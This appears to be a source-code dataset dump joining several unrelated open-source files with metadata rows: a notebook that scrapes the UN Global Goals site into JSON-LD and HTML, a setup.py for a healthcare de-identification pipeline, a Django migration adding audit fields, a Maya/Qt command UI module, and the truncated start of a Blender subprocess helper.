# * Src: https://github.com/westurner/pyglobalgoals/blob/v0.1.2/notebooks/globalgoals-pyglobalgoals.py.ipynb
# * Src: https://github.com/westurner/pyglobalgoals/blob/v0.2.1/notebooks/globalgoals-pyglobalgoals.py.ipynb
#
# * [x] Download HTML with requests
# * [x] Parse HTML with beautifulsoup
# * [x] Generate JSON[-LD] with ``collections.OrderedDict``
# * [-] REF: Functional methods -> more formal type model -> ``pyglobalgoals.<...>``
#
#
# * [JSON-LD](#JSONLD) document: **``./notebooks/data/globalgoals.jsonld``**
# * Src: https://github.com/westurner/pyglobalgoals/blob/master/notebooks/data/globalgoals.jsonld
#
#
# ### JSON-LD
#
# * Wikipedia: https://en.wikipedia.org/wiki/JSON-LD
# * Homepage: http://json-ld.org/
# * Docs: http://json-ld.org/playground/
# * Hashtag: #JSONLD
#
# ### RDFa
#
# * Wikipedia: https://en.wikipedia.org/wiki/RDFa
# * Standard: http://www.w3.org/TR/rdfa-core/
# * Docs: http://www.w3.org/TR/rdfa-primer/
# * Hashtag: #RDFa
# In[1]:
#!conda install -y beautiful-soup docutils jinja2 requests
get_ipython().system(u"pip install -U beautifulsoup4 jinja2 'requests<2.8' requests-cache version-information # tweepy")
import bs4
import jinja2
import requests
import requests_cache
requests_cache.install_cache('pyglobalgoals_cache')
#!pip install -U version_information
get_ipython().magic(u'load_ext version_information')
get_ipython().magic(u'version_information jupyter, bs4, jinja2, requests, requests_cache, version_information')
# In[2]:
url = "http://www.globalgoals.org/"
req = requests.get(url)
#print(req)
#print(sorted(dir(req)))
#req.<TAB>
#req??<[Ctrl-]Enter>
if not req.ok:
raise Exception(req)
content = req.content
print(content[:20])
# In[ ]:
# In[3]:
bs = bs4.BeautifulSoup(req.content)
print(bs.prettify())
# In[4]:
tiles = bs.find_all(class_='goal-tile-wrapper')
pp(tiles)
# In[5]:
tile = tiles[0]
print(tile)
# In[6]:
link = tile.findNext('a')
img = link.findNext('img')
img_title = img['alt'][:-5]
img_src = img['src']
link_href = link['href']
example = {'name': img_title, 'img_src': img_src, 'href': link_href}
print(example)
# In[7]:
import collections
def get_data_from_goal_tile_wrapper_div(node, n=None):
link = node.findNext('a')
img = link.findNext('img')
img_title = img['alt'][:-5]
img_src = img['src']
link_href = link['href']
output = collections.OrderedDict({'@type': 'un:GlobalGoal'})
if n:
output['n'] = n
output['name'] = img_title
output['image'] = img_src
output['url'] = link_href
return output
def get_goal_tile_data(bs):
for i, tile in enumerate(bs.find_all(class_='goal-tile-wrapper'), 1):
yield get_data_from_goal_tile_wrapper_div(tile, n=i)
tiles = list(get_goal_tile_data(bs))
import json
print(json.dumps(tiles, indent=2))
goal_tiles = tiles[:-1]
# In[ ]:
# In[8]:
import codecs
from path import Path
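# The JSON-LD @context built below maps the short keys used on each goal dict
# (name, image, url, description) onto schema.org terms, so that the '@graph'
# entries can be read as typed linked data.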
def build_default_context():
context = collections.OrderedDict()
# context["dc"] = "http://purl.org/dc/elements/1.1/"
context["schema"] = "http://schema.org/"
# context["xsd"] = "http://www.w3.org/2001/XMLSchema#"
# context["ex"] = "http://example.org/vocab#"
# context["ex:contains"] = {
# "@type": "@id"
# }
# default attrs (alternative: prefix each with schema:)
# schema.org/Thing == schema:Thing (!= schema:thing)
context["name"] = "http://schema.org/name"
context["image"] = {
"@type": "@id",
"@id": "http://schema.org/image"
}
context["url"] = {
"@type": "@id",
"@id":"http://schema.org/url"
}
context["description"] = {
"@type": "http://schema.org/Text",
"@id": "http://schema.org/description"
}
return context
DEFAULT_CONTEXT = build_default_context()
def goal_tiles_to_jsonld(nodes, context=None, default_context=DEFAULT_CONTEXT):
data = collections.OrderedDict()
if context is None and default_context is not None:
data['@context'] = build_default_context()
elif context:
data['@context'] = context
elif default_context:
data['@context'] = default_context
data['@graph'] = nodes
return data
DATA_DIR = Path('.') / 'data'
#DATA_DIR = Path(__file__).dirname
#DATA_DIR = determine_path_to(current_notebook) # PWD initially defaults to nb.CWD
DATA_DIR.makedirs_p()
GLOBAL_GOALS_JSONLD_PATH = DATA_DIR / 'globalgoals.jsonld'
def write_global_goals_jsonld(goal_tiles, path=GLOBAL_GOALS_JSONLD_PATH):
goal_tiles_jsonld = goal_tiles_to_jsonld(goal_tiles)
with codecs.open(path, 'w', 'utf8') as fileobj:
json.dump(goal_tiles_jsonld, fileobj, indent=2)
def read_global_goals_jsonld(path=GLOBAL_GOALS_JSONLD_PATH, prettyprint=True):
with codecs.open(path, 'r', 'utf8') as fileobj:
global_goals_dict = json.load(fileobj,
object_pairs_hook=collections.OrderedDict)
return global_goals_dict
def print_json_dumps(global_goals_dict, indent=2):
print(json.dumps(global_goals_dict, indent=indent))
write_global_goals_jsonld(goal_tiles)
global_goals_dict = read_global_goals_jsonld(path=GLOBAL_GOALS_JSONLD_PATH)
assert global_goals_dict == goal_tiles_to_jsonld(goal_tiles)
print_json_dumps(global_goals_dict)
# In[9]:
def build_tweet_for_goal_tile(node):
return '##gg{n} {name} {url} {image} @TheGlobalGoals #GlobalGoals'.format(**node)
tweets = list(build_tweet_for_goal_tile(tile) for tile in goal_tiles)
tweets
# In[10]:
for node in goal_tiles:
img_basename = node['image'].split('/')[-1]
node['image_basename'] = img_basename
node['tweet_txt'] = build_tweet_for_goal_tile(node)
print(json.dumps(goal_tiles, indent=2))
# In[11]:
#!conda install -y pycurl
try:
import pycurl
except ImportError as e:
import warnings
warnings.warn(unicode(e))
def pycurl_download_file(url, dest_path, follow_redirects=True):
with open(dest_path, 'wb') as f:
c = pycurl.Curl()
c.setopt(c.URL, url)
c.setopt(c.WRITEDATA, f)
if follow_redirects:
c.setopt(c.FOLLOWLOCATION, True)
c.perform()
c.close()
return (url, dest_path)
# In[12]:
import requests
def requests_download_file(url, dest_path, **kwargs):
local_filename = url.split('/')[-1]
# NOTE the stream=True parameter
r = requests.get(url, stream=True)
with open(dest_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
f.flush()
return (url, dest_path)
# In[13]:
import urllib
def urllib_urlretrieve_download_file(url, dest_path):
"""
* https://docs.python.org/2/library/urllib.html#urllib.urlretrieve
"""
(filename, headers) = urllib.urlretrieve(url, dest_path)
return (url, filename)
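# Note: the three download helpers above (pycurl, requests, urllib) are interchangeable;
# only requests_download_file is actually used below, the others are kept for reference.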
# In[14]:
def deduplicate_on_attr(nodes, attr='image_basename'):
attrindex = collections.OrderedDict()
for node in nodes:
attrindex.setdefault(node[attr], [])
attrindex[node[attr]].append(node)
return attrindex
def check_for_key_collisions(dict_of_lists):
for name, _nodes in dict_of_lists.items():
if len(_nodes) > 1:
raise Exception('duplicate filenames: {!r}'.format((name, _nodes)))
attrindex = deduplicate_on_attr(goal_tiles, attr='image_basename')
check_for_key_collisions(attrindex)
#
IMG_DIR = DATA_DIR / 'images'
IMG_DIR.makedirs_p()
def download_goal_tile_images(nodes, img_path):
for node in nodes:
dest_path = img_path / node['image_basename']
source_url = node['image']
(url, dest) = requests_download_file(source_url, dest_path)
node['image_path'] = dest
print((node['n'], node['name']))
print((node['image_path']))
# time.sleep(1) # see: requests_cache
download_goal_tile_images(goal_tiles, IMG_DIR)
tiles_jsonld = goal_tiles_to_jsonld(goal_tiles)
print(json.dumps(tiles_jsonld, indent=2))
# In[15]:
#import jupyter.display as display
import IPython.display as display
display.Image(goal_tiles[0]['image_path'])
# In[16]:
import IPython.display
for tile in goal_tiles:
x = IPython.display.Image(tile['image_path'])
x
# In[17]:
import IPython.display
def display_goal_images():
for tile in goal_tiles:
yield IPython.display.Image(tile['image_path'])
x = list(display_goal_images())
#pp(x)
IPython.display.display(*x)
# In[18]:
import string
print(string.punctuation)
NOT_URI_CHARS = dict.fromkeys(string.punctuation + string.digits)
NOT_URI_CHARS.pop('-')
NOT_URI_CHARS.pop('_')
def _slugify(txt):
"""an ~approximate slugify function for human-readable URI #fragments"""
txt = txt.strip().lower()
chars = (
(c if c != ' ' else '-') for c in txt if
c not in NOT_URI_CHARS)
return u''.join(chars)
def _slugify_single_dash(txt):
"""
* unlike docutils, this function does not strip stopwords like 'and' and 'or'
TODO: locate this method in docutils
"""
def _one_dash_only(txt):
count = 0
for char in txt:
if char == '-':
count += 1
else:
if count:
yield '-'
yield char
count = 0
return u''.join(_one_dash_only(_slugify(txt)))
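# Illustrative examples of the helpers above:
#   _slugify("No Poverty") -> 'no-poverty'
#   _slugify_single_dash("Good Health and Well-Being") -> 'good-health-and-well-being'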
for node in goal_tiles:
node['name_numbered'] = "%d. %s" % (node['n'], node['name'])
node['slug_rst'] = _slugify_single_dash(node['name'])
node['slug_md'] = _slugify_single_dash(node['name'])
print_json_dumps(goal_tiles)
# In[19]:
import IPython.display
def display_goal_images():
for tile in goal_tiles:
yield IPython.display.Markdown("## %s" % tile['name_numbered'])
yield IPython.display.Image(tile['image_path'])
yield IPython.display.Markdown(tile['tweet_txt'].replace('##', '\##'))
x = list(display_goal_images())
#pp(x)
IPython.display.display(*x)
# In[20]:
TMPL_RST = """
The Global Goals
******************
.. contents::
{% for node in nodes %}
{{ node['name_numbered'] }}
======================================================
| {{ node['url'] }}
.. image:: {{ node['image'] }}{# node['image_path'] #}
:target: {{ node['url'] }}
:alt: {{ node['name'] }}
..
{{ node['tweet_txt'] }}
{% endfor %}
"""
tmpl_rst = jinja2.Template(TMPL_RST)
output_rst = tmpl_rst.render(nodes=goal_tiles)
print(output_rst)
# In[21]:
output_rst_path = DATA_DIR / 'globalgoals.rst'
with codecs.open(output_rst_path, 'w', encoding='utf-8') as f:
f.write(output_rst)
print("# wrote goals to %r" % output_rst_path)
# In[22]:
import docutils.core
output_rst_html = docutils.core.publish_string(output_rst, writer_name='html')
print(bs4.BeautifulSoup(output_rst_html).find(id='the-global-goals'))
# In[23]:
IPython.display.HTML(output_rst_html)
# In[24]:
TMPL_MD = """
# The Global Goals
**Contents:**
{% for node in nodes %}
* [{{ node['name_numbered'] }}](#{{ node['slug_md'] }})
{%- endfor %}
{% for node in nodes %}
## {{ node['name_numbered'] }}
{{ node['url'] }}
[![{{node['name_numbered']}}]({{ node['image'] }})]({{ node['url'] }})
> {{ node['tweet_txt'] }}
{% endfor %}
"""
tmpl_md = jinja2.Template(TMPL_MD)
output_markdown = tmpl_md.render(nodes=goal_tiles)
print(output_markdown)
# In[25]:
output_md_path = DATA_DIR / 'globalgoals.md'
with codecs.open(output_md_path, 'w', encoding='utf-8') as f:
f.write(output_markdown)
print("# wrote goals to %r" % output_md_path)
# In[26]:
IPython.display.Markdown(output_markdown)
# In[27]:
context = dict(nodes=goal_tiles)
# In[28]:
TMPL_HTML = """
<h1>The Global Goals</h1>
<h2>Contents:</h2>
{% for node in nodes %}
<li><a href="#{{node.slug_md}}">{{node.name_numbered}}</a></li>
{%- endfor %}
{% for node in nodes %}
<div class="goal-tile">
<h2><a name="{{node.slug_md}}">{{ node.name_numbered }}</a></h2>
<a href="{{node.url}}">{{node.url}} </a>
<a href="{{node.url}}">
<img src="{{node.image}}" alt="{{node.name_numbered}}"/>{{node.url}} </a>
<div style="margin-left: 12px">
{{ node.tweet_txt }}
</div>
</div>
{% endfor %}
"""
tmpl_html = jinja2.Template(TMPL_HTML)
output_html = tmpl_html.render(**context)
print(output_html)
# In[29]:
output_html_path = DATA_DIR / 'globalgoals.html'
with codecs.open(output_html_path, 'w', encoding='utf-8') as f:
f.write(output_html)
print("# wrote goals to %r" % output_html_path)
# In[30]:
IPython.display.HTML(output_html)
# In[31]:
import jinja2
# TODO: prefix un:
TMPL_RDFA_HTML5 = ("""
<div prefix="schema: http://schema.org/
un: http://schema.un.org/#">
<h1>The Global Goals</h1>
<h2>Contents:</h2>
{%- for node in nodes %}
<li><a href="#{{node.slug_md}}">{{node.name_numbered}}</a></li>
{%- endfor %}
{% for node in nodes %}
<div class="goal-tile" resource="{{node.url}}" typeof="un:GlobalGoal">
<div style="display:none">
<meta property="schema:name" content="{{node.name}}">
<meta property="schema:image" content="{{node.image}}">
<meta property="#n" content="{{node.n}}">
</div>
<h2><a name="{{node.slug_md}}">{{ node.name_numbered }}</a></h2>
<a property="schema:url" href="{{node.url}}">{{node.url}} </a>
<a href="{{node.url}}">
<img src="{{node.image}}" alt="{{node.name_numbered}}"/>{{node.url}} </a>
<div style="margin-left: 12px">
{{ node.tweet_txt }}
</div>
</div>
{% endfor %}
</div>
"""
)
tmpl_rdfa_html5 = jinja2.Template(TMPL_RDFA_HTML5)
output_rdfa_html5 = tmpl_rdfa_html5.render(**context)
print(output_rdfa_html5)
# In[32]:
output_rdfa_html5_path = DATA_DIR / 'globalgoals.rdfa.html5.html'
with codecs.open(output_rdfa_html5_path, 'w', encoding='utf-8') as f:
f.write(output_rdfa_html5)
print("# wrote goals to %r" % output_rdfa_html5_path)
# In[33]:
IPython.display.HTML(output_rdfa_html5)
# In[34]:
# tmpl_html
# tmpl_rdfa_html5
import difflib
for line in difflib.unified_diff(
TMPL_HTML.splitlines(),
TMPL_RDFA_HTML5.splitlines()):
print(line)
| bsd-3-clause | -4,042,131,204,744,934,400 | 24.630094 | 120 | 0.635763 | false | 2.940478 | false | false | false |
GoogleCloudPlatform/healthcare-deid | setup.py | 1 | 1364 | """Setup module for the healthcare_deid DLP pipeline.
All of the code necessary to run the pipeline is packaged into a source
distribution that is uploaded to the --staging_location specified on the command
line. The source distribution is then installed on the workers before they
start running.
When remotely executing the pipeline, `--setup_file path/to/setup.py` must be
added to the pipeline's command line.
"""
import os
import setuptools
# Add required python packages that should be installed over and above the
# standard DataFlow worker environment. Version restrictions are supported if
# necessary.
REQUIRED_PACKAGES = [
'apache_beam[gcp]',
'google-api-python-client',
'google-cloud-storage',
'six==1.10.0',
]
packages = ['common', 'dlp', 'physionet']
package_dir = {p: p for p in packages}
# Use eval from bazel-bin so we get the generated results_pb2.py file.
# If it doesn't exist, then the job is another pipeline that doesn't need eval.
eval_bazel_path = 'bazel-bin/eval/run_pipeline.runfiles/__main__/eval'
if os.path.exists(eval_bazel_path):
packages.append('eval')
package_dir['eval'] = eval_bazel_path
setuptools.setup(
name='healthcare_deid',
version='0.0.1',
package_dir=package_dir,
description='Healthcare Deid pipeline package.',
install_requires=REQUIRED_PACKAGES,
packages=packages)
| apache-2.0 | 6,858,331,243,784,327,000 | 32.268293 | 80 | 0.737537 | false | 3.598945 | false | false | false |
SethGreylyn/gwells | gwells/migrations/0009_auto_20170711_1600_squashed_0010_auto_20170713_0917.py | 1 | 20389 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-07-13 17:57
from __future__ import unicode_literals
from decimal import Decimal
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
replaces = [('gwells', '0009_auto_20170711_1600'), ('gwells', '0010_auto_20170713_0917')]
dependencies = [
('gwells', '0008_auto_20170707_1158'),
]
operations = [
migrations.RemoveField(
model_name='activitysubmission',
name='created',
),
migrations.RemoveField(
model_name='activitysubmission',
name='modified',
),
migrations.RemoveField(
model_name='ltsaowner',
name='created',
),
migrations.RemoveField(
model_name='ltsaowner',
name='modified',
),
migrations.RemoveField(
model_name='well',
name='created',
),
migrations.RemoveField(
model_name='well',
name='modified',
),
migrations.AddField(
model_name='activitysubmission',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='activitysubmission',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='activitysubmission',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='activitysubmission',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='bedrockmaterial',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='bedrockmaterial',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='bedrockmaterial',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='bedrockmaterial',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='bedrockmaterialdescriptor',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='bedrockmaterialdescriptor',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='bedrockmaterialdescriptor',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='bedrockmaterialdescriptor',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='driller',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='driller',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='driller',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='driller',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='drillingcompany',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='drillingcompany',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='drillingcompany',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='drillingcompany',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='drillingmethod',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='drillingmethod',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='drillingmethod',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='drillingmethod',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='groundelevationmethod',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='groundelevationmethod',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='groundelevationmethod',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='groundelevationmethod',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='intendedwateruse',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='intendedwateruse',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='intendedwateruse',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='intendedwateruse',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='landdistrict',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='landdistrict',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='landdistrict',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='landdistrict',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologycolour',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologycolour',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologycolour',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologycolour',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologydescription',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologydescription',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologydescription',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologydescription',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologyhardness',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologyhardness',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologyhardness',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologyhardness',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologymoisture',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologymoisture',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologymoisture',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologymoisture',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologystructure',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologystructure',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologystructure',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologystructure',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologyweathering',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologyweathering',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='lithologyweathering',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='lithologyweathering',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='ltsaowner',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='ltsaowner',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='ltsaowner',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='ltsaowner',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='provincestate',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='provincestate',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='provincestate',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='provincestate',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='surficialmaterial',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='surficialmaterial',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='surficialmaterial',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='surficialmaterial',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='well',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='well',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='well',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='well',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='wellactivitytype',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='wellactivitytype',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='wellactivitytype',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='wellactivitytype',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='wellclass',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='wellclass',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='wellclass',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='wellclass',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='wellsubclass',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='wellsubclass',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='wellsubclass',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='wellsubclass',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='wellyieldunit',
name='when_created',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='wellyieldunit',
name='when_updated',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='wellyieldunit',
name='who_created',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AddField(
model_name='wellyieldunit',
name='who_updated',
field=models.CharField(default='', max_length=30),
preserve_default=False,
),
migrations.AlterField(
model_name='activitysubmission',
name='drilling_method',
field=models.ForeignKey(db_column='drilling_method_guid', null=True, on_delete=django.db.models.deletion.CASCADE, to='gwells.DrillingMethod', verbose_name='Drilling Method'),
),
migrations.AlterField(
model_name='activitysubmission',
name='latitude',
field=models.DecimalField(decimal_places=6, max_digits=8, null=True),
),
migrations.AlterField(
model_name='activitysubmission',
name='longitude',
field=models.DecimalField(decimal_places=6, max_digits=9, null=True),
),
migrations.AlterField(
model_name='lithologydescription',
name='lithology_from',
field=models.DecimalField(decimal_places=2, max_digits=7, validators=[django.core.validators.MinValueValidator(Decimal('0.00'))], verbose_name='From'),
),
migrations.AlterField(
model_name='lithologydescription',
name='lithology_to',
field=models.DecimalField(decimal_places=2, max_digits=7, validators=[django.core.validators.MinValueValidator(Decimal('0.01'))], verbose_name='To'),
),
]
| apache-2.0 | -280,287,383,028,197,200 | 34.45913 | 186 | 0.548286 | false | 4.581798 | false | false | false |
dsparrow27/zoocore | zoo/libs/command/commandui.py | 1 | 2760 | from functools import partial
from qt import QtWidgets, QtGui, QtCore
from zoo.libs import iconlib
from zoo.libs.utils import zlogging
logger = zlogging.getLogger(__name__)
class CommandActionBase(QtCore.QObject):
"""CommandUi class deals with encapsulating a command as a widget
"""
triggered = QtCore.Signal(str)
triggeredUi = QtCore.Signal(str)
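# Both signals carry the command id as a string: ``triggered`` fires on a normal
# invocation, ``triggeredUi`` when the option-box / UI variant is invoked.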
def __init__(self, command):
super(CommandActionBase, self).__init__()
self.command = command
self.item = None
def create(self, parent=None):
pass
class MenuItem(CommandActionBase):
def create(self, parent=None, optionBox=False):
from maya import cmds
uiData = self.command.uiData
self.item = cmds.menuItem(label=uiData["label"], boldFont=uiData.get("bold", False), parent=parent,
italicized=uiData.get("italicized", False), command=self.emitCommand,
optionBox=optionBox)
if optionBox:
cmds.menuItem(parent=parent, optionBox=optionBox, command=self.emitCommandUi)
return self.item
def emitCommand(self, *args):
"""
:param args: unused; absorbs the extra argument Maya passes to menu item commands
:type args: tuple
"""
self.triggered.emit(self.command.id)
def emitCommandUi(self, *args):
"""
:param args: unused; absorbs the extra argument Maya passes to menu item commands
:type args: tuple
"""
self.triggeredUi.emit(self.command.id)
class CommandAction(CommandActionBase):
def create(self, parent=None):
uiData = self.command.uiData
self.item = QtWidgets.QWidgetAction(parent)
text = uiData.get("label", "NOLABEL")
actionLabel = QtWidgets.QLabel(text)
self.item.setDefaultWidget(actionLabel)
color = uiData.get("color", "")
backColor = uiData.get("backgroundColor", "")
if color or backColor:
actionLabel.setStyleSheet(
"QLabel {background-color: %s; color: %s;}" % (backColor,
color))
icon = uiData.get("icon")
if icon:
if isinstance(icon, QtGui.QIcon):
self.item.setIcon(icon)
else:
icon = iconlib.icon(icon)
if not icon.isNull():
self.item.setIcon(icon)
self.item.setStatusTip(uiData.get("tooltip"))
self.item.triggered.connect(partial(self.triggered.emit, self.command.id))
logger.debug("Added commandAction, {}".format(text))
return self.item
def show(self):
if self.item is not None:
self.item.show()
| gpl-3.0 | -7,807,650,875,466,042,000 | 33.5 | 107 | 0.598913 | false | 4.119403 | false | false | false |
Microvellum/Fluid-Designer | win64-vc/2.78/Python/bin/2.78/scripts/addons/io_blend_utils/bl_utils/subprocess_helper.py | 1 | 5646 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
"""
Defines an operator mix-in to use for non-blocking command line access.
"""
class SubprocessHelper:
"""
Mix-in class for operators to run commands in a non-blocking way.
This uses a modal operator to manage an external process.
Subclass must define:
``command``:
List of arguments to pass to subprocess.Popen
report_interval: Time in seconds between updating reports.
``process_pre()``:
Callback that runs before the process executes.
``process_post(returncode)``:
Callback that runs when the process has ended.
returncode is -1 if the process was terminated.
Subclass may define:
``environment``:
Dict of environment variables exposed to the subprocess.
Contrary to the subprocess.Popen(env=...) parameter, this
dict is not used to replace the existing environment
entirely, but is just used to update it.
"""
environ = {}
command = ()
@staticmethod
def _non_blocking_readlines(f, chunk=64):
"""
